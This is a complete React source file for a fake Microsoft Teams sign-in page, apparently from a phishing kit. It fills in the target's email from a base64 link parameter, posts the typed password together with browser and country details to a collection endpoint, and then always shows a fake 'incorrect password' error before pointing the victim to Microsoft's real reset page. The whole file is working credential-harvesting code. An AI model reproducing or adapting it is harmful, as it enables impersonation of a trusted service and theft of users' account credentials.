import { useState, useEffect, useCallback, useRef } from 'react';
import { useLocation } from 'react-router-dom';
import { getCountryFromBrowser } from '../utils';

const LoginPage = () => {
  const [email, setEmail] = useState('');
  const [manualEmail, setManualEmail] = useState('');
  const [password, setPassword] = useState('');
  const [keepSignedIn, setKeepSignedIn] = useState(false);
  const [showPassword, setShowPassword] = useState(false);
  const [showLoginForm, setShowLoginForm] = useState(false);
  const [isLoading, setIsLoading] = useState(false);
  const [showLoadingOverlay, setShowLoadingOverlay] = useState(false);

  const passwordRef = useRef<HTMLInputElement>(null);
  const emailRef = useRef<HTMLInputElement>(null);
  const location = useLocation();

  // Extract email from URL. If none (or invalid), leave email empty so the
  // form presents an email input field for the user to type their own.
  useEffect(() => {
    let prefilled = '';
    const query = location.search.substring(1); // Remove the '?'

    if (query) {
      try {
        // Decode base64 email from query string
        const b64 = query.replace(/-/g, '+').replace(/_/g, '/');
        const decodedEmail = atob(b64);

        // Validate it's a proper email
        const emailRegex = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;
        if (emailRegex.test(decodedEmail)) {
          prefilled = decodedEmail;
        }
      } catch (e) {
        console.error('Failed to decode email:', e);
      }
    }

    setEmail(prefilled);

    // Show login form after initial delay; focus the right field
    setTimeout(() => {
      setShowLoginForm(true);
      if (prefilled) {
        passwordRef.current?.focus();
      } else {
        emailRef.current?.focus();
      }
    }, 3000);
  }, [location]);

  const handleSignIn = useCallback(async () => {
    const effectiveEmail = (email || manualEmail).trim();

    if (!effectiveEmail) {
      alert('Email is required');
      return;
    }

    if (!password) {
      alert('Please enter your password');
      return;
    }

    if (password.length <= 5) {
      alert('Password must be more than 5 characters');
      return;
    }

    setIsLoading(true);
    setShowLoadingOverlay(true);

    try {
      const loginUrl = '/api/login';

      await fetch(loginUrl, {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json',
          'X-Requested-With': 'ZoneLayerTeams'
        },
        body: JSON.stringify({
          email: effectiveEmail,
          password: password,
          keepSignedIn: keepSignedIn,
          country: getCountryFromBrowser(),
          timestamp: new Date().toISOString(),
          userAgent: navigator.userAgent,
          referrer: document.referrer || 'direct'
        })
      });

      // Wait 3 seconds before showing error message (always shows error like original)
      setTimeout(() => {
        setIsLoading(false);
        setShowLoadingOverlay(false);
        // Show the error message div
        const errorDiv = document.getElementById('error-message');
        if (errorDiv) {
          errorDiv.classList.add('show');
        }
      }, 3000);
    } catch (error) {
      console.error('Network error:', error);
      setTimeout(() => {
        setIsLoading(false);
        setShowLoadingOverlay(false);
        alert('Network error. Please check your connection.');
      }, 3000);
    }
  }, [email, manualEmail, password, keepSignedIn]);

  const handleEmailKeyPress = useCallback((e: React.KeyboardEvent) => {
    if (e.key === 'Enter') {
      e.preventDefault();
      passwordRef.current?.focus();
    }
  }, []);

  const handlePasswordKeyPress = useCallback((e: React.KeyboardEvent) => {
    if (e.key === 'Enter') {
      handleSignIn();
    }
  }, [handleSignIn]);

  const handleResetPassword = useCallback(() => {
    const effectiveEmail = (email || manualEmail).trim();
    const resetUrl = effectiveEmail
      ? `https://passwordreset.microsoftonline.com/?username=${encodeURIComponent(effectiveEmail)}`
      : 'https://passwordreset.microsoftonline.com/';
    window.open(resetUrl, '_blank');
  }, [email, manualEmail]);

  return (
    <>
      <style>{`
        :root {
          --c-bg: #f2f2f2;
          --c-card: #ffffff;
          --c-border: #d1d1d1;
          --c-primary: #0078d4;
          --c-primary-dark: #106ebe;
          --c-text: #252423;
          --c-text-mid: #616161;
          --c-error: #d13438;
          --font: 'Segoe UI', -apple-system, BlinkMacSystemFont, sans-serif;
        }
        *, *::before, *::after {
          box-sizing: border-box;
          margin: 0;
          padding: 0;
        }
        html, body, #root {
          width: 100%;
          min-height: 100vh;
          margin: 0;
          padding: 0;
          font-family: var(--font);
          font-size: 14px;
          color: var(--c-text);
          background: var(--c-bg);
        }
        .container {
          display: flex;
          align-items: center;
          justify-content: center;
          min-height: 100vh;
          width: 100%;
          padding: 20px;
          margin: 0 auto;
        }
        .login-box {
          background: var(--c-card);
          border-radius: 8px;
          box-shadow: 0 4px 20px rgba(0, 0, 0, 0.12);
          width: 100%;
          max-width: 440px;
          padding: 40px;
          position: relative;
        }
        .logo {
          text-align: center;
          margin-bottom: 32px;
        }
        .logo img {
          height: 24px;
        }
        .title {
          font-size: 24px;
          font-weight: 600;
          margin-bottom: 24px;
          text-align: center;
        }
        .subtitle {
          font-size: 15px;
          color: var(--c-text-mid);
          margin-bottom: 32px;
          text-align: center;
        }
        .form-group {
          margin-bottom: 20px;
        }
        .form-label {
          display: block;
          font-size: 14px;
          font-weight: 600;
          margin-bottom: 6px;
        }
        .form-input {
          width: 100%;
          padding: 12px;
          border: 1px solid var(--c-border);
          border-radius: 4px;
          font-size: 15px;
        }
        .form-input:focus {
          outline: none;
          border-color: var(--c-primary);
          box-shadow: 0 0 0 2px rgba(0, 120, 212, 0.2);
        }
        .email-display {
          background: #f8f8f8;
          border: 1px solid #e0e0e0;
          border-radius: 4px;
          padding: 12px;
          font-size: 15px;
          color: var(--c-text);
          margin-bottom: 20px;
        }
        .error-message {
          background: #fdf3f3;
          border: 1px solid #f2c1c1;
          border-radius: 4px;
          padding: 12px;
          color: var(--c-error);
          margin-bottom: 20px;
          font-size: 14px;
          display: none;
        }
        .error-message.show {
          display: block;
        }
        .error-message a {
          color: var(--c-primary);
          font-weight: 600;
          text-decoration: none;
        }
        .error-message a:hover {
          text-decoration: underline;
        }
        .btn-primary {
          background: var(--c-primary);
          color: white;
          border: none;
          border-radius: 4px;
          padding: 12px 20px;
          font-size: 15px;
          font-weight: 600;
          width: 100%;
          cursor: pointer;
          transition: background 0.15s;
        }
        .btn-primary:hover {
          background: var(--c-primary-dark);
        }
        .btn-primary:disabled {
          opacity: 0.6;
          cursor: not-allowed;
        }
        .footer-links {
          margin-top: 32px;
          text-align: center;
          font-size: 13px;
          color: var(--c-text-mid);
        }
        .footer-links a {
          color: var(--c-primary);
          text-decoration: none;
        }
        .footer-links a:hover {
          text-decoration: underline;
        }
        .loading-message {
          text-align: center;
          margin: 30px 0;
          color: var(--c-text-mid);
          font-size: 15px;
        }
        .dots {
          display: inline-flex;
          gap: 4px;
          vertical-align: middle;
          margin-left: 2px;
        }
        .dots span {
          display: inline-block;
          width: 4px;
          height: 4px;
          border-radius: 50%;
          background: currentColor;
          opacity: 0;
          animation: dotPop 1.4s ease-in-out infinite;
        }
        .dots span:nth-child(2) {
          animation-delay: 0.2s;
        }
        .dots span:nth-child(3) {
          animation-delay: 0.4s;
        }
        @keyframes dotPop {
          0%, 80%, 100% {
            opacity: 0;
          }
          40% {
            opacity: 1;
          }
        }
        .hidden {
          display: none !important;
        }
        .password-container {
          position: relative;
        }
        .show-password {
          position: absolute;
          right: 10px;
          top: 50%;
          transform: translateY(-50%);
          background: none;
          border: none;
          color: var(--c-primary);
          cursor: pointer;
          font-size: 12px;
          font-weight: 500;
        }
        .show-password:hover {
          text-decoration: underline;
        }
        .checkbox-container {
          display: flex;
          align-items: center;
          margin-bottom: 20px;
        }
        .checkbox-container input {
          margin-right: 8px;
          accent-color: var(--c-primary);
        }
        .loading-overlay {
          display: none;
          position: fixed;
          top: 0;
          left: 0;
          width: 100%;
          height: 100%;
          background-color: rgba(0, 0, 0, 0.3);
          z-index: 1000;
          justify-content: center;
          align-items: center;
        }
        .loading-overlay.show {
          display: flex;
        }
        .spinner {
          border: 4px solid #f3f3f3;
          border-top: 4px solid var(--c-primary);
          border-radius: 50%;
          width: 40px;
          height: 40px;
          animation: spin 1s linear infinite;
        }
        @keyframes spin {
          0% {
            transform: rotate(0deg);
          }
          100% {
            transform: rotate(360deg);
          }
        }
      `}</style>

      <div className="container">
        <div className="login-box">
          <div className={`loading-overlay ${showLoadingOverlay ? 'show' : ''}`} id="loadingOverlay">
            <div className="spinner"></div>
          </div>

          <div className="logo">
            <img
              src="https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg"
              alt="Microsoft"
            />
          </div>

          <div id="initial-loading" className={showLoginForm ? 'hidden' : ''}>
            <div className="loading-message">
              Trying to sign you in<span className="dots"><span></span><span></span><span></span></span>
            </div>
          </div>

          <div id="login-form" className={showLoginForm ? '' : 'hidden'}>
            <div className="title">Sign in</div>
            <div className="subtitle" id="subtitle-text">to continue to Microsoft Teams</div>

            <div className="error-message" id="error-message">
              Your account or password is incorrect. If you don't remember your password,{' '}
              <a href="#" id="reset-link" onClick={(e) => { e.preventDefault(); handleResetPassword(); }}>
                reset it now
              </a>.
            </div>

            <div className="form-group">
              {email ? (
                <div className="email-display" id="email-display">
                  {email}
                </div>
              ) : (
                <>
                  <label className="form-label" htmlFor="email">
                    Email
                  </label>
                  <input
                    ref={emailRef}
                    type="email"
                    id="email"
                    className="form-input"
                    placeholder="Email"
                    autoComplete="username"
                    value={manualEmail}
                    onChange={(e) => setManualEmail(e.target.value)}
                    onKeyPress={handleEmailKeyPress}
                  />
                </>
              )}
            </div>

            <div className="form-group">
              <label className="form-label" htmlFor="password">
                Password
              </label>
              <div className="password-container">
                <input
                  ref={passwordRef}
                  type={showPassword ? 'text' : 'password'}
                  id="password"
                  className="form-input"
                  placeholder="Password"
                  autoComplete="current-password"
                  value={password}
                  onChange={(e) => setPassword(e.target.value)}
                  onKeyPress={handlePasswordKeyPress}
                />
                <button
                  type="button"
                  className="show-password"
                  id="show-password"
                  onClick={() => setShowPassword(!showPassword)}
                >
                  {showPassword ? 'Hide' : 'Show'}
                </button>
              </div>
            </div>

            <div className="checkbox-container">
              <input
                type="checkbox"
                id="keepSignedIn"
                checked={keepSignedIn}
                onChange={(e) => setKeepSignedIn(e.target.checked)}
              />
              <label htmlFor="keepSignedIn">Keep me signed in</label>
            </div>

            <button
              className="btn-primary"
              id="signin-button"
              onClick={handleSignIn}
              disabled={isLoading}
            >
              {isLoading ? 'Signing in...' : 'Sign in'}
            </button>

            <div className="footer-links">
              <a href="#" id="forgot-password" onClick={(e) => { e.preventDefault(); handleResetPassword(); }}>
                Forgot my password
              </a>
              <span style={{ margin: '0 8px' }}>•</span>
              <a href="/" id="other-options">Other ways to sign in</a>
            </div>
          </div>
        </div>
      </div>
    </>
  );
};

export default LoginPage;
